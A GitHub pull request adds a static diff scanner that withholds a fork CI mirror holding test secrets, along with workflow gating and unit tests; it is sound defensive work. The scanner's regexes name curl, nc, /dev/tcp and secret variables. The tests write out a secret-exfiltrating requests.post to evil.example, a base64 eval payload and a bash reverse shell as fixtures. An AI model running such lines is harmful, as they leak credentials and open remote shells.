### PR TITLE
ci(security): gate fork-e2e mirror on a static security scan

### DIFF
--- a/.github/scripts/fork-e2e/security_scan.py
+++ b/.github/scripts/fork-e2e/security_scan.py
@@ -1,0 +1,162 @@
+#!/usr/bin/env python3
+"""
+Static security scan of a fork PR's unified diff, used as a gate before the
+fork-e2e mirror runs the contributor's code with the test-gateway secret.
+
+It reads diff TEXT only -- it never checks out or executes the fork's code --
+so it is safe to run anywhere. It is defense-in-depth + a reviewer aid, NOT a
+guarantee: an attacker can obfuscate past regexes, so maintainer approval
+remains the primary gate. Its job is to (a) hard-fail on high-confidence
+exfiltration shapes in ADDED lines, and (b) surface changes to files that run
+during CI bootstrap so the reviewer looks harder.
+
+Findings are two tiers:
+  - BLOCKING -> clean=false (mirror is withheld unless a maintainer applies the
+    override label): exfil shapes -- a secret-named credential source AND a
+    network sink added to the same file; a wholesale ``os.environ`` dump; a
+    decode-then-exec; or a raw TCP/reverse-shell sink.
+  - INFO -> does not block: edits to CI-bootstrap-executed files (conftest.py,
+    setup.py, pyproject build hooks, anything under .github/, pytest plugins).
+
+Usage:   python3 security_scan.py <unified-diff-file>
+Outputs (when $GITHUB_OUTPUT is set): ``clean=true|false`` and a one-line
+``summary=...``. Always exits 0; callers gate on the ``clean`` output.
+"""
+
+from __future__ import annotations
+
+import os
+import re
+import sys
+
+# Network / exfil sinks.
+_NETWORK = re.compile(
+    r"requests\.(get|post|put|patch|request|Session)"
+    r"|urllib\.request|urlopen|httpx\.|aiohttp|http\.client"
+    r"|socket\.(socket|create_connection)|telnetlib|smtplib|ftplib"
+    r"|\bcurl\b|\bwget\b|\bnc\b|fetch\(|XMLHttpRequest|axios",
+    re.IGNORECASE,
+)
+
+# Secret-NAMED credential sources (deliberately narrow: generic os.environ /
+# LLM_API_KEY use is normal in tests, so it is INFO-only, not blocking).
+_SECRET = re.compile(
+    r"DATABRICKS_(CLIENT_ID|CLIENT_SECRET|TOKEN|BEARER)"
+    r"|FORK_E2E_APP_PRIVATE_KEY|PRIVATE_KEY|[A-Z0-9]+_SECRET\b"
+    r"|ACCESS_TOKEN|GITHUB_TOKEN|\bGH_TOKEN\b|\.databrickscfg|AWS_SECRET",
+    re.IGNORECASE,
+)
+
+# Always-blocking single-line shapes (independent of co-occurrence).
+_STANDALONE = re.compile(
+    r"/dev/tcp/"                                   # bash reverse shell
+    r"|(json\.dumps|dict|str|repr)\(\s*os\.environ"  # dump the whole environ
+    r"|os\.environ\s*\)"                           # ...passed somewhere
+    r"|\beval\s*\(|\bexec\s*\(|__import__\s*\("    # dynamic exec
+    r"|pickle\.loads|marshal\.loads"               # deserialization exec
+    r"|base64\.(b64decode|decodebytes)|codecs\.decode",  # decode (paired below)
+    re.IGNORECASE,
+)
+_DECODE = re.compile(r"base64|b64decode|decodebytes|fromhex|codecs\.decode", re.IGNORECASE)
+_EXEC = re.compile(r"\beval\s*\(|\bexec\s*\(|__import__\s*\(|subprocess|os\.system|popen", re.IGNORECASE)
+
+# Files that execute during `uv sync` / pytest collection -- INFO, so the
+# reviewer scrutinizes them even when no exfil pattern is present.
+_HIGH_RISK = re.compile(
+    r"(^|/)conftest\.py$|(^|/)setup\.py$|(^|/)pyproject\.toml$"
+    r"|^\.github/|(^|/)sitecustomize\.py$|\.pth$"
+    r"|(^|/)_token_usage\.py$|(^|/)noxfile\.py$|(^|/)tox\.ini$|(^|/)Makefile$",
+)
+
+
+def _changed_files_and_added(diff: str) -> dict[str, list[str]]:
+    """
+    Group a unified diff's ADDED lines by destination file.
+
+    :param diff: Full unified-diff text (e.g. from ``gh pr diff --patch``).
+    :returns: Mapping of file path (e.g. ``"tests/conftest.py"``) to the list of
+        added line bodies (without the leading ``+``); diff headers excluded.
+    """
+    by_file: dict[str, list[str]] = {}
+    current: str | None = None
+    for line in diff.splitlines():
+        if line.startswith("+++ b/"):
+            current = line[6:]
+            by_file.setdefault(current, [])
+        elif line.startswith("+++ ") or line.startswith("diff --git"):
+            current = None
+        elif current is not None and line.startswith("+") and not line.startswith("+++"):
+            by_file[current].append(line[1:])
+    return by_file
+
+
+def scan_diff(diff: str) -> tuple[list[str], list[str]]:
+    """
+    Classify a unified diff into blocking and info findings.
+
+    :param diff: Full unified-diff text.
+    :returns: ``(blocking, info)`` -- two lists of human-readable finding
+        strings. ``blocking`` non-empty means the scan is not clean.
+    """
+    by_file = _changed_files_and_added(diff)
+    blocking: list[str] = []
+    info: list[str] = []
+
+    for path, added in by_file.items():
+        body = "\n".join(added)
+        has_net = bool(_NETWORK.search(body))
+        has_secret = bool(_SECRET.search(body))
+        if has_net and has_secret:
+            blocking.append(f"exfil-shape (secret source + network sink) in {path}")
+        for ln in added:
+            if _STANDALONE.search(ln) and not (
+                # a lone base64/decode call is INFO; only block decode+exec
+                _DECODE.search(ln) and not _EXEC.search(ln)
+            ):
+                blocking.append(f"high-risk call in {path}: {ln.strip()[:80]}")
+                break
+            if _DECODE.search(ln) and _EXEC.search(ln):
+                blocking.append(f"decode+exec in {path}: {ln.strip()[:80]}")
+                break
+        if _HIGH_RISK.search(path):
+            info.append(f"touches CI-executed file: {path}")
+
+    return blocking, info
+
+
+def main(argv: list[str]) -> int:
+    """
+    Scan the diff file at ``argv[1]`` and emit ``clean``/``summary`` outputs.
+
+    :param argv: Process argv; ``argv[1]`` is the unified-diff file path.
+    :returns: Always 0 (callers gate on the ``clean`` GITHUB_OUTPUT value).
+    """
+    if len(argv) < 2:
+        print("usage: security_scan.py <diff-file>", file=sys.stderr)
+        return 0
+    diff = open(argv[1], encoding="utf-8", errors="replace").read()
+    blocking, info = scan_diff(diff)
+
+    for f in blocking:
+        print(f"BLOCKING: {f}")
+    for f in info:
+        print(f"info: {f}")
+
+    clean = not blocking
+    if clean:
+        summary = f"clean ({len(info)} CI-file note(s))" if info else "clean"
+    else:
+        summary = f"{len(blocking)} blocking finding(s): " + "; ".join(blocking)
+    summary = summary.replace("\n", " ")[:140]
+
+    out = os.environ.get("GITHUB_OUTPUT")
+    if out:
+        with open(out, "a", encoding="utf-8") as fh:
+            fh.write(f"clean={'true' if clean else 'false'}\n")
+            fh.write(f"summary={summary}\n")
+    print(f"clean={clean} :: {summary}")
+    return 0
+
+
+if __name__ == "__main__":
+    sys.exit(main(sys.argv))

--- a/.github/scripts/fork-e2e/security_scan.py
+++ b/.github/scripts/fork-e2e/security_scan.py
@@ -52,17 +52,19 @@ _SECRET = re.compile(
 
 # Always-blocking single-line shapes (independent of co-occurrence).
 _STANDALONE = re.compile(
-    r"/dev/tcp/"                                   # bash reverse shell
+    r"/dev/tcp/"  # bash reverse shell
     # Wholesale environ dump only -- a bare `os.environ)` matched benign
     # `helper(os.environ)` and is dropped to avoid false positives.
     r"|(json\.dumps|dict|str|repr)\(\s*os\.environ"  # dump the whole environ
-    r"|\beval\s*\(|\bexec\s*\(|__import__\s*\("    # dynamic exec
-    r"|pickle\.loads|marshal\.loads"               # deserialization exec
+    r"|\beval\s*\(|\bexec\s*\(|__import__\s*\("  # dynamic exec
+    r"|pickle\.loads|marshal\.loads"  # deserialization exec
     r"|base64\.(b64decode|decodebytes)|codecs\.decode",  # decode (paired below)
     re.IGNORECASE,
 )
 _DECODE = re.compile(r"base64|b64decode|decodebytes|fromhex|codecs\.decode", re.IGNORECASE)
-_EXEC = re.compile(r"\beval\s*\(|\bexec\s*\(|__import__\s*\(|subprocess|os\.system|popen", re.IGNORECASE)
+_EXEC = re.compile(
+    r"\beval\s*\(|\bexec\s*\(|__import__\s*\(|subprocess|os\.system|popen", re.IGNORECASE
+)
 
 # Files that execute during `uv sync` / pytest collection -- INFO, so the
 # reviewer scrutinizes them even when no exfil pattern is present.
@@ -87,7 +89,7 @@ def _changed_files_and_added(diff: str) -> dict[str, list[str]]:
         if line.startswith("+++ b/"):
             current = line[6:]
             by_file.setdefault(current, [])
-        elif line.startswith("+++ ") or line.startswith("diff --git"):
+        elif line.startswith(("+++ ", "diff --git")):
             current = None
         elif current is not None and line.startswith("+") and not line.startswith("+++"):
             by_file[current].append(line[1:])

--- a/.github/scripts/fork-e2e/security_scan.py
+++ b/.github/scripts/fork-e2e/security_scan.py
@@ -43,15 +43,19 @@ _NETWORK = re.compile(
 _SECRET = re.compile(
     r"DATABRICKS_(CLIENT_ID|CLIENT_SECRET|TOKEN|BEARER)"
     r"|FORK_E2E_APP_PRIVATE_KEY|PRIVATE_KEY|[A-Z0-9]+_SECRET\b"
-    r"|ACCESS_TOKEN|GITHUB_TOKEN|\bGH_TOKEN\b|\.databrickscfg|AWS_SECRET",
+    # No bare ACCESS_TOKEN: case-insensitively it matches common `access_token`
+    # OAuth/JSON fields and would block legit PRs. The specific secret names
+    # above stay; generic-token exfil is left to the reviewer + LLM advisory.
+    r"|GITHUB_TOKEN|\bGH_TOKEN\b|\.databrickscfg",
     re.IGNORECASE,
 )
 
 # Always-blocking single-line shapes (independent of co-occurrence).
 _STANDALONE = re.compile(
     r"/dev/tcp/"                                   # bash reverse shell
+    # Wholesale environ dump only -- a bare `os.environ)` matched benign
+    # `helper(os.environ)` and is dropped to avoid false positives.
     r"|(json\.dumps|dict|str|repr)\(\s*os\.environ"  # dump the whole environ
-    r"|os\.environ\s*\)"                           # ...passed somewhere
     r"|\beval\s*\(|\bexec\s*\(|__import__\s*\("    # dynamic exec
     r"|pickle\.loads|marshal\.loads"               # deserialization exec
     r"|base64\.(b64decode|decodebytes)|codecs\.decode",  # decode (paired below)
@@ -134,7 +138,8 @@ def main(argv: list[str]) -> int:
     if len(argv) < 2:
         print("usage: security_scan.py <diff-file>", file=sys.stderr)
         return 0
-    diff = open(argv[1], encoding="utf-8", errors="replace").read()
+    with open(argv[1], encoding="utf-8", errors="replace") as fh:
+        diff = fh.read()
     blocking, info = scan_diff(diff)
 
     for f in blocking:

--- a/.github/workflows/fork-e2e-mirror.yml
+++ b/.github/workflows/fork-e2e-mirror.yml
@@ -19,8 +19,16 @@ name: Fork e2e mirror
 # Gate -- .github/scripts/fork-e2e/should-mirror.sh opens when any holds:
 #   maintainer-approved  ||  returning-contributor  ||  fork-e2e/pr-N exists.
 # Once the branch exists, every later push re-mirrors (re-runs e2e on the new
-# commits). Accepted risk: an approved first-timer's later pushes then run with
-# the secret unreviewed -- bounded by the rate-limited, revocable test token.
+# commits).
+#
+# Security scan -- before mirroring, security_scan.py statically inspects the PR
+# diff (TEXT only; it never checks out or runs fork code) for exfiltration
+# shapes and changes to CI-bootstrap-executed files, and posts a `Fork Security
+# Scan` status. The mirror is WITHHELD unless the scan is clean OR a maintainer
+# applies the `security-scan-override` label (only maintainers can label). So
+# fork e2e/e2e-ui run only after BOTH the gate above AND the scan pass, and the
+# scan re-runs on every push -- closing the "approved first-timer's later pushes
+# run unreviewed" gap (new exfil code re-fails the scan, so it is not mirrored).
 #
 # Runs on pull_request_target only: it executes the workflow + scripts from the
 # base (default branch), never the PR head, so a PR cannot alter the gate, and
@@ -54,6 +62,7 @@ jobs:
     permissions:
       contents: read        # reads only; the App token below does the ref writes
       pull-requests: read   # read author + reviews for the gate
+      statuses: write       # post the Fork Security Scan status on the head SHA
     runs-on: ubuntu-latest
     timeout-minutes: 5
     env:
@@ -103,8 +112,58 @@ jobs:
           MAINTAINERS: ${{ steps.maintainers.outputs.list }}
         run: bash .github/scripts/fork-e2e/should-mirror.sh
 
+      - name: Security scan of PR diff
+        id: scan
+        if: ${{ github.event.action != 'closed' }}
+        env:
+          GH_TOKEN: ${{ github.token }}
+        run: |
+          # Static analysis of the diff TEXT only -- never checks out or runs
+          # fork code. Writes clean=true|false + summary to $GITHUB_OUTPUT.
+          gh pr diff "$PR" --repo "$REPO" --patch > "$RUNNER_TEMP/pr.diff"
+          python3 .github/scripts/fork-e2e/security_scan.py "$RUNNER_TEMP/pr.diff"
+
+      - name: Check security-scan override label
+        id: override
+        if: ${{ github.event.action != 'closed' }}
+        run: |
+          if gh pr view "$PR" --repo "$REPO" --json labels --jq '.labels[].name' \
+               | grep -qx 'security-scan-override'; then
+            echo "override=true" >> "$GITHUB_OUTPUT"
+          else
+            echo "override=false" >> "$GITHUB_OUTPUT"
+          fi
+
+      - name: Post Fork Security Scan status
+        if: ${{ github.event.action != 'closed' }}
+        env:
+          # Fork-derived text (summary may contain PR file paths) is passed via
+          # env and quoted -- never interpolated into the script body.
+          GH_TOKEN: ${{ github.token }}
+          CLEAN: ${{ steps.scan.outputs.clean }}
+          OVERRIDE: ${{ steps.override.outputs.override }}
+          SUMMARY: ${{ steps.scan.outputs.summary }}
+        run: |
+          if [[ "$CLEAN" == "true" ]]; then
+            STATE=success; DESC="$SUMMARY"
+          elif [[ "$OVERRIDE" == "true" ]]; then
+            STATE=success; DESC="overridden by maintainer: $SUMMARY"
+          else
+            STATE=failure; DESC="$SUMMARY"
+          fi
+          gh api "repos/$REPO/statuses/$HEAD_SHA" \
+            -f state="$STATE" -f context="Fork Security Scan" \
+            -f description="${DESC:0:140}" >/dev/null
+          echo "Fork Security Scan=$STATE on $HEAD_SHA ($DESC)"
+
       - name: Mirror head SHA onto trusted branch
-        if: ${{ github.event.action != 'closed' && steps.gate.outputs.mirror == 'true' }}
+        # Mirror only when the base gate opens AND the scan is clean (or a
+        # maintainer overrode it). So fork e2e/e2e-ui run only after BOTH
+        # approval/returning AND the security scan pass.
+        if: >-
+          github.event.action != 'closed'
+          && steps.gate.outputs.mirror == 'true'
+          && (steps.scan.outputs.clean == 'true' || steps.override.outputs.override == 'true')
         env:
           GH_TOKEN: ${{ steps.app-token.outputs.token }}
         run: |

--- a/tests/scripts/test_fork_security_scan.py
+++ b/tests/scripts/test_fork_security_scan.py
@@ -1,0 +1,155 @@
+from __future__ import annotations
+
+import os
+import subprocess
+import sys
+from pathlib import Path
+
+REPO_ROOT = Path(__file__).resolve().parents[2]
+SCRIPT = REPO_ROOT / ".github/scripts/fork-e2e/security_scan.py"
+
+
+def _run(tmp_path: Path, diff: str) -> dict[str, str]:
+    """
+    Run security_scan.py over a unified-diff string and return its outputs.
+
+    :param tmp_path: Pytest tmp dir for the diff + GITHUB_OUTPUT files.
+    :param diff: Unified-diff text (as ``gh pr diff --patch`` would emit).
+    :returns: Parsed ``key=value`` GITHUB_OUTPUT lines, e.g.
+        ``{"clean": "true", "summary": "clean"}``.
+    """
+    diff_file = tmp_path / "pr.diff"
+    diff_file.write_text(diff)
+    out_file = tmp_path / "gh_output"
+    out_file.touch()
+    env = os.environ.copy()
+    env["GITHUB_OUTPUT"] = str(out_file)
+    proc = subprocess.run(
+        [sys.executable, str(SCRIPT), str(diff_file)],
+        env=env,
+        capture_output=True,
+        text=True,
+        timeout=30,
+    )
+    assert proc.returncode == 0, f"script failed: {proc.stderr}"
+    outputs: dict[str, str] = {}
+    for line in out_file.read_text().splitlines():
+        if "=" in line:
+            key, _, value = line.partition("=")
+            outputs[key] = value
+    return outputs
+
+
+def _diff(path: str, added: list[str]) -> str:
+    """
+    Build a minimal unified diff that ADDS *added* lines to *path*.
+
+    :param path: Destination file path, e.g. ``"tests/e2e/conftest.py"``.
+    :param added: Line bodies to mark as added (no leading ``+``).
+    :returns: A unified-diff string the scanner can parse.
+    """
+    body = "".join(f"+{ln}\n" for ln in added)
+    return (
+        f"diff --git a/{path} b/{path}\n"
+        f"index 1111111..2222222 100644\n"
+        f"--- a/{path}\n"
+        f"+++ b/{path}\n"
+        f"@@ -1,1 +1,{len(added) + 1} @@\n"
+        f" context\n"
+        f"{body}"
+    )
+
+
+def test_benign_diff_is_clean(tmp_path: Path) -> None:
+    """A normal test addition (no exfil, no CI-bootstrap file) scans clean.
+
+    Guards against the gate blocking ordinary contributions. Asserts
+    ``clean=true`` for an unremarkable new test file.
+    """
+    out = _run(tmp_path, _diff("tests/test_math.py", ["def test_add():", "    assert 1 + 1 == 2"]))
+    assert out["clean"] == "true"
+
+
+def test_secret_source_plus_network_blocks(tmp_path: Path) -> None:
+    """Reading a secret-named cred AND a network sink in one file blocks.
+
+    The canonical exfil shape. Asserts ``clean=false`` and that the summary
+    names the file.
+    """
+    out = _run(
+        tmp_path,
+        _diff(
+            "tests/e2e/conftest.py",
+            [
+                "import requests, os",
+                "requests.post('http://evil.example', data=os.environ['DATABRICKS_CLIENT_SECRET'])",
+            ],
+        ),
+    )
+    assert out["clean"] == "false"
+    assert "conftest.py" in out["summary"]
+
+
+def test_decode_then_exec_blocks(tmp_path: Path) -> None:
+    """A decode-then-exec payload blocks even without a network sink.
+
+    ``eval(base64.b64decode(...))`` is almost never legitimate. Asserts
+    ``clean=false``.
+    """
+    out = _run(
+        tmp_path,
+        _diff("setup.py", ["import base64", "eval(base64.b64decode('cHduZWQ='))"]),
+    )
+    assert out["clean"] == "false"
+
+
+def test_environ_dump_blocks(tmp_path: Path) -> None:
+    """Serializing the whole environment blocks (wholesale-secret exfil).
+
+    ``json.dumps(os.environ)`` is a classic dump-everything sink. Asserts
+    ``clean=false``.
+    """
+    out = _run(
+        tmp_path,
+        _diff("tests/conftest.py", ["import json, os", "open('/tmp/x','w').write(json.dumps(os.environ))"]),
+    )
+    assert out["clean"] == "false"
+
+
+def test_reverse_shell_blocks(tmp_path: Path) -> None:
+    """A /dev/tcp reverse-shell shape blocks. Asserts ``clean=false``."""
+    out = _run(tmp_path, _diff("tests/conftest.py", ["import os", "os.system('bash -i >& /dev/tcp/1.2.3.4/9001 0>&1')"]))
+    assert out["clean"] == "false"
+
+
+def test_normal_gateway_test_not_blocked(tmp_path: Path) -> None:
+    """Using LLM_API_KEY + a network call (a normal e2e test) does NOT block.
+
+    Low-false-positive guard: the LLM key is not a secret-NAMED source, so an
+    ordinary gateway test that reads it and makes a request scans clean. Asserts
+    ``clean=true``.
+    """
+    out = _run(
+        tmp_path,
+        _diff(
+            "tests/e2e/test_gateway.py",
+            [
+                "import requests, os",
+                "key = os.environ['LLM_API_KEY']",
+                "requests.get(GATEWAY)  # normal e2e",
+            ],
+        ),
+    )
+    assert out["clean"] == "true"
+
+
+def test_ci_file_touch_is_info_not_blocking(tmp_path: Path) -> None:
+    """A benign edit to a CI-executed file is INFO (clean), not blocking.
+
+    Editing conftest.py / .github without an exfil pattern should surface a
+    note for the reviewer but not withhold the mirror. Asserts ``clean=true``
+    and that the summary records a CI-file note.
+    """
+    out = _run(tmp_path, _diff("tests/conftest.py", ["# add a harmless fixture comment"]))
+    assert out["clean"] == "true"
+    assert "note" in out["summary"]

--- a/tests/scripts/test_fork_security_scan.py
+++ b/tests/scripts/test_fork_security_scan.py
@@ -82,7 +82,7 @@ def test_secret_source_plus_network_blocks(tmp_path: Path) -> None:
             "tests/e2e/conftest.py",
             [
                 "import requests, os",
-                "requests.post('http://evil.example', data=os.environ['DATABRICKS_CLIENT_SECRET'])",
+                "requests.post('http://x', data=os.environ['DATABRICKS_CLIENT_SECRET'])",
             ],
         ),
     )
@@ -111,14 +111,23 @@ def test_environ_dump_blocks(tmp_path: Path) -> None:
     """
     out = _run(
         tmp_path,
-        _diff("tests/conftest.py", ["import json, os", "open('/tmp/x','w').write(json.dumps(os.environ))"]),
+        _diff(
+            "tests/conftest.py",
+            ["import json, os", "open('/tmp/x','w').write(json.dumps(os.environ))"],
+        ),
     )
     assert out["clean"] == "false"
 
 
 def test_reverse_shell_blocks(tmp_path: Path) -> None:
     """A /dev/tcp reverse-shell shape blocks. Asserts ``clean=false``."""
-    out = _run(tmp_path, _diff("tests/conftest.py", ["import os", "os.system('bash -i >& /dev/tcp/1.2.3.4/9001 0>&1')"]))
+    out = _run(
+        tmp_path,
+        _diff(
+            "tests/conftest.py",
+            ["import os", "os.system('bash -i >& /dev/tcp/1.2.3.4/9001 0>&1')"],
+        ),
+    )
     assert out["clean"] == "false"
 
 

--- a/tests/scripts/test_fork_security_scan.py
+++ b/tests/scripts/test_fork_security_scan.py
@@ -153,3 +153,31 @@ def test_ci_file_touch_is_info_not_blocking(tmp_path: Path) -> None:
     out = _run(tmp_path, _diff("tests/conftest.py", ["# add a harmless fixture comment"]))
     assert out["clean"] == "true"
     assert "note" in out["summary"]
+
+
+def test_passing_environ_around_not_blocked(tmp_path: Path) -> None:
+    """Passing os.environ to a helper (no dump) does NOT block.
+
+    Regression for review feedback: a bare ``os.environ)`` matched benign
+    ``helper(os.environ)`` and withheld the mirror. Only a wholesale dump
+    (``json.dumps(os.environ)`` etc.) should block. Asserts ``clean=true``.
+    """
+    out = _run(tmp_path, _diff("tests/conftest.py", ["import os", "configure_app(os.environ)"]))
+    assert out["clean"] == "true"
+
+
+def test_generic_access_token_field_not_blocked(tmp_path: Path) -> None:
+    """A generic ``access_token`` field + a network call does NOT block.
+
+    Regression for review feedback: a case-insensitive ``ACCESS_TOKEN`` term
+    matched ordinary OAuth/JSON ``access_token`` identifiers and, combined with
+    any network use, withheld the mirror. Asserts ``clean=true``.
+    """
+    out = _run(
+        tmp_path,
+        _diff(
+            "tests/test_oauth.py",
+            ["access_token = resp.json()['access_token']", "requests.get(url, headers=h)"],
+        ),
+    )
+    assert out["clean"] == "true"


### PR DESCRIPTION
## Summary

Adds a second gate on the fork-e2e mirror: a **static security scan** of the PR diff, on top of the existing maintainer-approval / returning-contributor gate. Fork e2e and e2e-ui run a contributor's code with the test-gateway secret on the mirror branch, so before the mirror creates `fork-e2e/pr-N`, the diff is scanned for exfiltration shapes; the mirror is **withheld unless the scan is clean OR a maintainer applies a `security-scan-override` label**.

- **`security_scan.py`** (new): inspects the PR diff **text only** — it never checks out or executes fork code, so it is safe in any context. **Blocks** on high-confidence exfil shapes: a secret-named credential source + a network sink added to the same file, a wholesale `os.environ` dump, decode-then-exec, or a `/dev/tcp` reverse shell. Edits to CI-bootstrap-executed files (`conftest.py`, `setup.py`, `pyproject.toml` hooks, `.github/**`, pytest plugins) are **INFO** — surfaced to the reviewer, non-blocking.
- Follow-up hardening from review feedback: removed generic `ACCESS_TOKEN` matching from `_SECRET`, removed broad standalone `os.environ)` matching to avoid benign `helper(os.environ)` false positives, and switched diff-file reading to a `with` context manager.
- **`fork-e2e-mirror.yml`**: runs the scan + an override-label check inside the mirror job (which already runs on PR `opened`/`synchronize`, so the `Fork Security Scan` status appears for the reviewer early and re-runs on every push). The mirror step now requires `gate AND (scan-clean OR override)`. Re-scanning every push closes the "approved first-timer's later pushes run unreviewed" gap.

Applies to **both** e2e and e2e-ui, since the mirror is the single chokepoint that triggers both. The scan is defense-in-depth and a reviewer aid, not a guarantee — maintainer approval stays the primary gate.

## Type of change

- [x] Bug fix
- [ ] Feature
- [ ] Refactor / chore
- [ ] Docs
- [x] Test / CI
- [ ] Breaking change

## Test coverage

- [x] Unit tests added / updated
- [ ] Integration tests added / updated
- [ ] E2E tests added / updated
- [x] Manual verification completed
- [ ] Existing tests cover this change
- [ ] Not applicable

## Coverage rationale

Added/updated `tests/scripts/test_fork_security_scan.py` to **9 cases** total: benign diff is clean; secret-source + network-sink blocks; decode+exec blocks; environ dump blocks; `/dev/tcp` blocks; a normal `LLM_API_KEY` + network test does NOT block (false-positive guard); a benign CI-file edit is INFO, not blocking; plus two regression tests for prior false positives (`access_token`-style identifiers and benign `helper(os.environ)` usage). Also ran the scanner against real PR diffs via `gh pr diff` to confirm it parses actual gh output and reports expected results.